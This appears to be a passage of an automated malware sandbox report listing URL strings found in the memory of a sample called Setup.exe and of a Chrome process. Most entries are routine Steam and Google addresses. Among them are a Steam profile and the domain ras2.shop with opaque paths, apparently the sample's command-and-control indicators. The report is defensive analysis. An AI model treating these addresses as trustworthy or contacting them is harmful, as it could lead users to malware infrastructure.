      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;l
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=e
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en
      Source: chrome.exe, 00000002.00000002.3553888972.000065080271E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3553921309.000065080272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543083315.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2637755343.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544026587.00006508006A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
      Source: chrome.exe, 00000002.00000002.3553888972.000065080271E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1Cache-Control:
      Source: chrome.exe, 00000002.00000002.3553921309.000065080272C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1a
      Source: chrome.exe, 00000002.00000002.3542598180.0000650800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3541993812.000065080018C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1
      Source: chrome.exe, 00000002.00000002.3550668799.0000650801329000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544061169.00006508006C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542598180.0000650800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1Content-Security-Policy:
      Source: chrome.exe, 00000002.00000002.3550668799.0000650801329000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544061169.00006508006C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542598180.0000650800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1Content-Type:
      Source: chrome.exe, 00000002.00000002.3544061169.00006508006C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3542598180.0000650800304000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/download-dt/1d
      Source: chrome.exe, 00000002.00000002.3546106785.0000650800AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTgyNjA
      Source: chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_p
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnnkih
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompecagn
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545025285.000065080089C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdgkjc
      Source: chrome.exe, 00000002.00000002.3543854065.0000650800638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpn
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanlea
      Source: chrome.exe, 00000002.00000002.3541731237.00006508000F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjdbkj
      Source: chrome.exe, 00000002.00000002.3542662744.000065080030C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.
      Source: chrome.exe, 00000002.00000002.3549073860.0000650800FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3547579560.0000650800DB6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885948549.0000650800A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
      Source: chrome.exe, 00000002.00000003.2632571633.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3549073860.0000650800FC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3547579560.0000650800DB6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885461080.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1990835189.0000650800FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548414778.0000650800ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885948549.0000650800A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
      Source: chrome.exe, 00000002.00000002.3550634679.0000650801310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3547297207.0000650800D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550182639.00006508012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3550545654.0000650801305000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2134948941.000065080271E000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3548761590.0000650800F18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
      Source: chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
      Source: chrome.exe, 00000002.00000002.3548509144.0000650800EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetModels?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
      Source: chrome.exe, 00000002.00000002.3545483481.00006508009C7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545415544.000065080098C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
      Source: chrome.exe, 00000002.00000003.1889128782.000065080120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888826743.000065080040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889004039.00006508010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
      Source: chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3549548116.0000650801038000.00000004.00000800.00020000.00000000.sdmp, chromecache_73.4.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
      Source: chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=truee
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: chrome.exe, 00000002.00000002.3545483481.00006508009C7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545415544.000065080098C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545335468.0000650800960000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830198421.0000000000B81000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/Up
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/Up#p
      Source: Setup.exe, 00000000.00000003.1830198421.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371
      Source: Setup.exe, 00000000.00000003.1830198421.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ras2.shop/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371Qk
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
      Source: chrome.exe, 00000002.00000002.3541337974.0000650800030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win6
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
      Source: chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
      Source: chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
      Source: chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
      Source: chrome.exe, 00000002.00000002.3544674309.00006508007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544572535.0000650800788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
      Source: chrome.exe, 00000002.00000002.3544674309.00006508007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543223589.00006508004AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544572535.0000650800788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: chrome.exe, 00000002.00000003.1906108233.00006508002B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: chrome.exe, 00000002.00000003.2637755343.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2001447093.0000650800454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1922378839.0000650802F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: Setup.exe, 00000000.00000003.1806352166.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807976102.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199680660089
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/pr
      Source: Setup.exe, Setup.exe, 00000000.00000002.2771839573.00000000031EC000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2771447715.00000000030D0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2769540945.0000000000B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680660089
